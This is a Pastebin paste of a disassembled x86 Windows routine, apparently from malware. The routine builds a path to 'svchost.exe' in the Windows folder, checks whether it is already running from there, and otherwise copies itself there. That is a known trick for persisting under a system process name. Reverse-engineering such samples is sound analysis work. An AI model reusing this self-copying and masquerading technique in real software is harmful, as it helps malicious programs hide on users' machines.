Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- .text:151125DA push 104h ; uSize
- .text:151125DF push offset PathName ; lpBuffer
- .text:151125E4 call ds:GetSystemDirectoryA
- .text:151125EA push 104h ; nSize
- .text:151125EF push offset String ; lpFilename
- .text:151125F4 push 0 ; lpModuleName
- .text:151125F6 call ds:GetModuleHandleA
- .text:151125FC push eax ; hModule
- .text:151125FD call ds:GetModuleFileNameA
- .text:15112603 push offset PathName ; lpString2
- .text:15112608 push offset Data ; lpString1
- .text:1511260D call ds:lstrcpyA
- .text:15112613 mov esi, ds:lstrcatA
- .text:15112619 push offset asc_15111570 ; "\\"
- .text:1511261E push offset Data ; lpString1
- .text:15112623 call esi ; lstrcatA
- .text:15112625 push offset a__Svchost_exe ; "..\\svchost.exe"
- .text:1511262A push offset Data ; lpString1
- .text:1511262F call esi ; lstrcatA
- .text:15112631 push offset sub_151133F0
- .text:15112636 call sub_15113B70
- .text:1511263B add esp, 4
- .text:1511263E test eax, eax
- .text:15112640 jnz short loc_15112648
- .text:15112642 push eax
- .text:15112643 call sub_151133F0
- .text:15112648 ; ---------------------------------------------------------------------------
- .text:15112648
- .text:15112648 loc_15112648: ; CODE XREF: start+90j
- .text:15112648 push offset Data ; lpString
- .text:1511264D call sub_15113FA0
- .text:15112652 add esp, 4
- .text:15112655 push eax ; lpString2
- .text:15112656 push offset String ; lpString
- .text:1511265B call sub_15113FA0
- .text:15112660 add esp, 4
- .text:15112663 push eax ; lpString1
- .text:15112664 call ds:lstrcmpA
- .text:1511266A test eax, eax
- .text:1511266C jz short loc_15112680
- .text:1511266E push 0 ; bFailIfExists
- .text:15112670 push offset Data ; lpNewFileName
- .text:15112675 push offset String ; lpExistingFileName
- .text:1511267A call ds:CopyFileA
- .text:15112680
- .text:15112680 loc_15112680: ; CODE XREF: start+1Dj
- .text:15112680 ; start+BCj
- .text:15112680 push 0 ; uExitCode
- .text:15112682 call ds:ExitProcess
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement